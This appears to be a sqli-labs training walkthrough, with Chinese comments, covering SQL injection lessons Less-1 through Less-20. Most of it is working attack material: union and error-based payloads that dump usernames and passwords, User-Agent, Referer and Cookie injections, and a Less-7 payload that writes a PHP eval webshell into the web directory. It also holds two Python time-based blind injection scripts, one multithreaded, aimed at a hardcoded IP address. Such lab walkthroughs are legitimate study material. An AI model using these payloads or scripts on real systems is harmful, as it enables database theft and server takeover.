Less-1
?id=1' order by 3#    → 正常
?id=1' order by 4#    → Unknown column '4' in 'order clause'，可知原查詢共 3 列
# 注意：在 GET 參數裡直接打 # 會被瀏覽器當成 URL fragment 而送不到伺服器，實際要寫成 %23（後面的 payload 改用 --+、腳本裡用 %23 就是這個原因）
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)--+
# → information_schema,challenges,mysql,performance_schema,security
?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')--+
# → emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users')--+
# → id,username,password （建議加上 and table_schema = 'security'，否則其他庫裡同名 users 表的欄位也會混進來）
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+
# → 用戶名：Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# → 密碼：  Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
# id 用不存在的 666 是為了讓原查詢沒有結果，顯示位才會輪到 union 的那一行；group_concat 預設最多回 1024 字元（group_concat_max_len），資料多時會被截斷，需分批取
Less-2  # 方法同上，不過此題為數值查詢：不用閉合引號，union 直接接在數字後面
?id=666 union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)
Less-3
?id=666') union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-4
?id=666") union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-5  # 頁面沒有顯示位，無法使用聯合查詢注入，改採報錯注入（floor(rand(0)*2) 配合 group by 觸發 Duplicate entry 報錯，把資料帶在報錯訊息裡）
# 模板：and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
# → Subquery returns more than 1 row，改用 limit N,1 一次只取一個值（見下）
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4,1)),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
# → Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3,1)),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
# → Duplicate entry 'users;1' for key 'group_key'；欄位、資料以此類推，改 limit 的偏移量逐一取出
Less-6  # 同 Less-5，把 ' 換成 " 閉合
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# 寫入後用一句話木馬客戶端連上即可（參數名 my）
# 前提：MySQL 帳號要有 FILE 權限、secure_file_priv 沒有限制到別的目錄、path 必須是 web 目錄下的絕對路徑且 mysql 程序對該目錄有寫入權限
# union 兩邊列數要一致：若此題跟 Less-1 一樣是 3 列，應寫成 union select 1,2,"<?php @eval($_POST['my']);?>" into outfile "path"
Less-8  # 閉合方式由 ')) 改為 '
Less-9&10  # 區別是前者用 ' 閉合、後者用 " 閉合
# 經過測試發現本題是時間盲注，附上腳本：
# coding:utf-8
import requests
import datetime
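def database_len(url, max_len=64, delay=1, get=None):
    """Recover the length of the current database name via time-based blind injection.

    For n = 1, 2, ... this sends
        ?id=1' and if(length(database())>n,sleep(delay),0)%23
    and treats a response that took at least ``delay`` seconds as "condition true".
    The first n whose response comes back fast is the length (length > n-1 held,
    length > n does not, so length == n).

    Args:
        url: base URL of the vulnerable page, e.g. ``http://host/Less-9/``.
        max_len: give up after this many probes; 64 is MySQL's identifier limit
            (the original stopped at 9 and then returned 9 regardless of the outcome).
        delay: seconds given to MySQL ``sleep()`` and used as the decision
            threshold.  Pick it well above the normal round-trip time, otherwise
            a slow but un-delayed response is misread as "true".
        get: ``get(url)`` used to issue the request; defaults to ``requests.get``.
            Injectable so the timing logic can be exercised without a network.

    Returns:
        The length as an int, or ``None`` if no probe up to ``max_len`` came back fast.
    """
    import time
    if get is None:
        get = requests.get
    for n in range(1, max_len + 1):
        # The comment terminator is sent as %23: a literal '#' in a GET URL is a
        # fragment and never reaches the server.
        payload = '''?id=1' and if(length(database())>%s,sleep(%s),0)''' % (n, delay)
        start = time.perf_counter()
        get(url + payload + '%23')
        elapsed = time.perf_counter() - start
        if elapsed < delay:
            print('database_len:', n)
            return n
    print('database_len: none found up to', max_len)
    return None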
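def database_name(url, database_len, charset='0123456789abcdefghijklmnopqrstuvwxyz_', delay=1, get=None):
    """Recover the current database name one character at a time (time-based blind).

    For every position 1..database_len and every candidate ``ch`` in ``charset``
    this sends
        ?id=1' and if(substr(database(),pos,1)='ch',sleep(delay),1)%23
    and takes the first candidate whose response is delayed by at least ``delay``.

    Args:
        url: base URL of the vulnerable page.
        database_len: number of characters to recover (from ``database_len()``).
        charset: candidates tried per position.  Must not contain ``'`` (it would
            break the payload).  Lowercase only is enough under a case-insensitive
            collation, but the recovered name then comes back lowercased.
        delay: seconds given to ``sleep()`` and used as the threshold; keep it
            well above the normal round-trip time.
        get: ``get(url)`` request function; defaults to ``requests.get``.

    Returns:
        The recovered name.  A position where no candidate matched is reported as
        ``?`` instead of being silently dropped (the original just shifted the
        remaining characters left, hiding the gap).
    """
    import time
    if get is None:
        get = requests.get
    name = ''
    for pos in range(1, database_len + 1):
        for ch in charset:
            payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(%s),1)''' % (pos, ch, delay)
            start = time.perf_counter()
            get(url + payload + '%23')
            if time.perf_counter() - start >= delay:
                name += ch
                break
        else:
            # for/else: ran out of candidates for this position without a match
            name += '?'
        print(name)
    print('database_name:', name)
    return name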
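url = '''http://43.247.91.228:84/Less-9/'''

if __name__ == '__main__':
    # Do not rebind the function name to its result: the original did
    # ``database_len = database_len(url)``, after which database_len was an int
    # and could not be called again.
    db_len = database_len(url)
    if db_len:
        database_name(url, db_len)
    # observed on the lab target: database_name: security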
Less-11
?uname=' or '1'='1&passwd=1' union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
# 登入表單的 POST 參數：uname 用萬能密碼 ' or '1'='1 繞過，passwd 欄位做 union 注入，# 註釋掉後面的語句
Less-12
?uname=") or ("1")=("1&passwd=1") union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
# 同 Less-11，閉合方式改為 ")：uname 用 ") or ("1")=("1 繞過
Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))#
# → XPATH syntax error: ':security'
# extractvalue/updatexml 的報錯回顯最多 32 字元，取較長資料要配合 substr 分段
或者
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name," | ") from information_schema.schemata limit 4,1)),floor(rand(0)*2))x from information_schema.tables group by x)a)#
# → Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')換成"
Less-15  # 沒有啥反應哈，試了試萬能密碼確定是 ' 閉合，然後進行時間盲注；對之前的腳本做了個升級，這次是多線程
# coding:utf-8
import requests
import datetime
import threading
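def database_len(url, i, delay=2, post=None):
    """Time-based probe for ``length(database()) > i`` against the login form.

    POSTs ``uname = admin' and if(length(database())>i,sleep(delay),0) #`` with a
    dummy password and reports whether the response took at least ``delay`` seconds.
    The literal ``#`` is fine here because it travels in the POST body, not the URL.
    ``sleep()`` is only evaluated on rows where username = 'admin' (AND
    short-circuits), so the probed username has to exist in the table.

    Args:
        url: URL of the login handler, e.g. ``http://host/Less-15/``.
        i: length to compare against.
        delay: seconds passed to ``sleep()`` and used as the threshold; keep it
            well above the normal round-trip time.
        post: ``post(url, data=...)`` used for the request; defaults to ``requests.post``.

    Returns:
        True if the response was delayed (length > i), else False.
    """
    import time
    if post is None:
        post = requests.post
    postdata = {
        'uname': '''admin' and if(length(database())>%s,sleep(%s),0) #''' % (i, delay),
        'passwd': '''1''',
    }
    start = time.perf_counter()
    post(url, data=postdata)
    return time.perf_counter() - start >= delay


def database_name(url, j, charset='0123456789abcdefghijklmnopqrstuvwxyz_', delay=2, post=None):
    """Recover character ``j`` (1-based) of the current database name.

    Tries every candidate in ``charset`` with
    ``uname = admin' and if(substr(database(),j,1)='ch',sleep(delay),1) #``
    and returns the first one whose response is delayed by at least ``delay``.

    Args:
        url: URL of the login handler.
        j: 1-based character position.
        charset: candidates to try; must not contain ``'``.  Lowercase is enough
            under a case-insensitive collation, but the result is then lowercased.
        delay: seconds passed to ``sleep()`` and used as the threshold.
        post: ``post(url, data=...)`` request function; defaults to ``requests.post``.

    Returns:
        The matching character, or ``None`` when no candidate matched.  Callers
        must handle None: the original crashed with TypeError on ``name += None``.
    """
    import time
    if post is None:
        post = requests.post
    for ch in charset:
        postdata = {
            'uname': '''admin' and if(substr(database(),%d,1)='%s',sleep(%s),1) #''' % (j, ch, delay),
            'passwd': '''1''',
        }
        start = time.perf_counter()
        post(url, data=postdata)
        if time.perf_counter() - start >= delay:
            return ch
    return None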
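class MyThread(threading.Thread):
    """Thread that runs ``func(*args)`` and keeps the return value for the caller.

    ``threading.Thread`` discards the target's return value; this subclass stores
    it in ``res`` so ``getresult()`` can be read after ``join()``.
    """

    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
        self.res = None  # set by run(); None until the thread has finished

    def getresult(self):
        """Return the value produced by ``run()`` (None before the thread ran)."""
        return self.res

    def run(self):
        self.res = self.func(*self.args)


# Probes fired in parallel per batch, and the upper bound for the name length
# (64 is MySQL's identifier limit).
BATCH = 9
MAX_LEN = 64


def main():
    """Recover the database name of Less-15 with parallel time-based probes.

    Step 1 probes ``length(database()) > n`` for a batch of n at once and takes the
    first n that comes back "false" as the length.  Unlike the original, which
    looped forever (and left ``databaselength`` unbound) whenever the length was
    10 or more, the batch window now advances until MAX_LEN.
    Step 2 probes every character position in parallel.

    Caveat: firing BATCH sleep() requests concurrently assumes the target (web
    server workers and MySQL connections) really handles them in parallel; if it
    serialises them the measured times stack up and results skew.  Lower BATCH
    if the output looks wrong.
    """
    url = '''http://43.247.91.228:84/Less-15/'''

    # --- step 1: length ---------------------------------------------------
    length = None
    lo = 1
    while length is None and lo <= MAX_LEN:
        batch = list(range(lo, min(lo + BATCH, MAX_LEN + 1)))
        threads = [MyThread(database_len, (url, n)) for n in batch]
        for t in threads:
            t.start()
        # Join everything first so no probe is left running in the background.
        for t in threads:
            t.join()
        for n, t in zip(batch, threads):
            if not t.getresult():
                # length > n-1 held (earlier probes were true), length > n does not
                length = n
                break
        lo += BATCH
    if length is None:
        print('database_len: not found (<= %d)' % MAX_LEN)
        return
    print('database_len:', length)

    # --- step 2: characters -----------------------------------------------
    threads = [MyThread(database_name, (url, pos)) for pos in range(1, length + 1)]
    for t in threads:
        t.start()
    name = ''
    for t in threads:
        t.join()
        ch = t.getresult()
        # database_name() yields None when no candidate matched; keep the
        # position visible instead of crashing on ``name += None``.
        name += ch if ch is not None else '?'
    print("database_name :" + name)


if __name__ == '__main__':
    main()
# observed on the lab target:
# database_len: 8
# database_name :security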
Less-16
'改成")
Less-17  # 嘗試了一會兒發現這裏只有知道用戶名才能進行注入，隨便試了個 admin 發現可以；密碼欄位會出現語法報錯，於是採用報錯注入
?uname=admin&passwd=1' and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit
Less-18#發現頁面會返回ip和user-agent,改了下xxf發現不行呀,於是嘗試在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1# XPATH syntax error:':security'
Less-19  # 顯示位在 Referer，所以嘗試在這裏注入
Referer: 1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4,1)),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit   # payload 跟著正常登入的 POST 一起送
# → "security;1"
Less-20  # 在 Cookie 裏面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1